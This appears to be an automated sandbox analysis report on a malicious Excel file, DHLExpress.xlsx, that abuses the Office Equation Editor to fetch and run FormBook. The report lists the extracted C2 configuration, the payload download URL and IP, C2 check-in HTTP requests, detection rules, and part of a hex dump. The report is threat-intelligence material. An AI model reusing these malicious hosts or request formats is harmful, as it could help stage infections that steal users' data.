Windows Analysis Report DHLExpress.xlsx

AV Detection:

Found malware configuration

Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.searakloset.com/bc93/"], "decoy": ["girlbutcher.com", "jfue984fs.xyz", "tov-avramivka.com", "dinglicf.com", "dvinecreationsxo.com", "countryconcerttickets.com", "gementh.com", "wenyab888.net", "xquisiteonecreditservices.com", "macklawrence.com", "4doyq.com", "china-ycgw.com", "millebelt.com", "iranianroom.com", "allgamescracked.com", "globalengineeringtnpasumo6.xyz", "fornerds.academy", "app4fan.com", "atlantahousingsolutions.com", "brandingspirits.com", "lauraimoveis.com", "selldistrict.com", "luxuryneverhurts.club", "jktyremanufacturingconclave.com", "lightrobotics.tech", "requiemme.com", "ippcservices.com", "chiplorain.com", "respectfullycannabisco.com", "diomond.com", "mbah-jamal-store.online", "cwindustrials.com", "zedexbank.com", "businessenetwork.com", "ceser33.com", "wilesmcmichael.com", "bromeliamart.com", "louisesshop.com", "sweetiemebee.com", "forex-tradingcapital.com", "softwaretestingbox.com", "localmay.com", "almaherapromo.store", "300dh.top", "exoticduchess.com", "zwork.net", "bluecrypto.xyz", "cqjjqc.com", "assetbutthealth.com", "comercioexpresschilpancingo.com", "exodiruis.com", "fitnsfreak.com", "heigray.xyz", "antepenult.com", "jsicapitallp.com", "boardwalksnj.com", "annamimtedemureworkshop.com", "qdguoji.com", "hscc100.com", "larryy.online", "connectprimerv.com", "escolaparaomundo.online", "lovelilly.net", "rcigzbvx.xyz"]}

Multi AV Scanner detection for submitted file

Source: DHLExpress.xlsx

ReversingLabs: Detection: 32%

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://103.167.92.57/winos11pro/vbc.exe

Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 7.2.cmd.exe.58e4b8.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cmd.exe.28d796c.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.580000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.504155697.000000000028C000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.468159322.0000000000590000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.505533328.00000000008A0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.466750651.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.505403506.0000000000720000.00000040.00000001.sdmp, cmd.exe
Source:	Binary string: cmd.pdb,$>J6$>J@$>J source: vbc.exe, 00000005.00000002.505732273.0000000002410000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.504182162.00000000002CA000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: vbc.exe, 00000005.00000002.505732273.0000000002410000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.504155697.000000000028C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.504182162.00000000002CA000.00000004.00000001.sdmp, cmd.exe

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405D7C FindFirstFileA,FindClose,		4_2_00405D7C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_004053AA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402630 FindFirstFileA,		4_2_00402630
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3E0202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,		7_2_4A3E0202
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3C2E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,		7_2_4A3C2E73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3C6E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,		7_2_4A3C6E47
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3DBF0C FindFirstFileW,FindNextFileW,FindClose,		7_2_4A3DBF0C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3CBBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,		7_2_4A3CBBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3E0492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,		7_2_4A3E0492

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.chiplorain.com

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.167.92.57:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.167.92.57:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.67.178.13 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.chiplorain.com
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.louisesshop.com
Source: C:\Windows\explorer.exe	Domain query: www.atlantahousingsolutions.com
Source: C:\Windows\explorer.exe	Domain query: www.searakloset.com
Source: C:\Windows\explorer.exe	Domain query: www.lauraimoveis.com
Source: C:\Windows\explorer.exe	Network Connect: 156.67.74.112 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.207.77 80			Jump to behavior

Performs DNS queries to domains with low reputation

Source:

DNS query: www.heigray.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.searakloset.com/bc93/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TESONETLT TESONETLT

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /bc93/?DD=h0Dd6TfP&5jMx_fYX=m45wz0yJH0eU0AdWNIhpnj7O98T4qieiIfcSO4QQLTkRI2A85Oo6eqE9guaDClHK+tDn+A== HTTP/1.1Host: www.chiplorain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?5jMx_fYX=/0p52NrLw6/lfqJ/6i2KRqaclY9EGZAkl3iVYOjyKH0fSpE9MHsWsCd4MfgGNBa7PLwApw==&DD=h0Dd6TfP HTTP/1.1Host: www.searakloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?DD=h0Dd6TfP&5jMx_fYX=45pLxo9kavwG0b6/ageG5KZoyEg3RdGQG9PSgAgmCz2Hqkg+0QkW1XX316CwBWlYmM0BuA== HTTP/1.1Host: www.lauraimoveis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?5jMx_fYX=NJ8vjIFYwVF+K1Zn/AGorNaFwyaz0G/XgrC+2klBX/IapeezUPO8bi3RGsgrxJXS1LqH5g==&DD=h0Dd6TfP HTTP/1.1Host: www.atlantahousingsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?DD=h0Dd6TfP&5jMx_fYX=Dtwu72sJ/YpTMebBbpFICpD7OPufwyJSP0x6RFU6mEZA3uDfPjbVMUZhI3MTljxZrpV9GA== HTTP/1.1Host: www.louisesshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bc93/?5jMx_fYX=LW5horzSF3uc1GWuNtjePQyf7tqmMuH+apCXxYGRs9OB+DuQ+Cegeibn8pPPEnsybp118Q==&DD=h0Dd6TfP HTTP/1.1Host: www.heigray.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 3.64.163.50 3.64.163.50

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 09:39:01 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Fri, 14 Jan 2022 04:42:48 GMTETag: "3cb6a-5d5836f56e1be"Accept-Ranges: bytesContent-Length: 248682Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /winos11pro/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 09:40:25 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be735-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 09:40:46 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.92.57

Found strings which match to known social media urls

Source: explorer.exe, 00000006.00000000.490679146.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

URLs found in memory or binary data

Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000000.460654323.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.467065994.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.463715625.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000000.460654323.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.467065994.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.463715625.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.467728024.0000000002250000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488931984.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.473278580.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.467728024.0000000002250000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488931984.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.490679146.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.495867140.00000000083B5000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/c
Source: explorer.exe, 00000006.00000000.495867140.00000000083B5000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.474003432.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493049861.000000000447A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.495867140.00000000083B5000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493049861.000000000447A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.495867140.00000000083B5000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.490679146.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64631AC.emf

Jump to behavior

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.chiplorain.com

Downloads files from webservers via HTTP

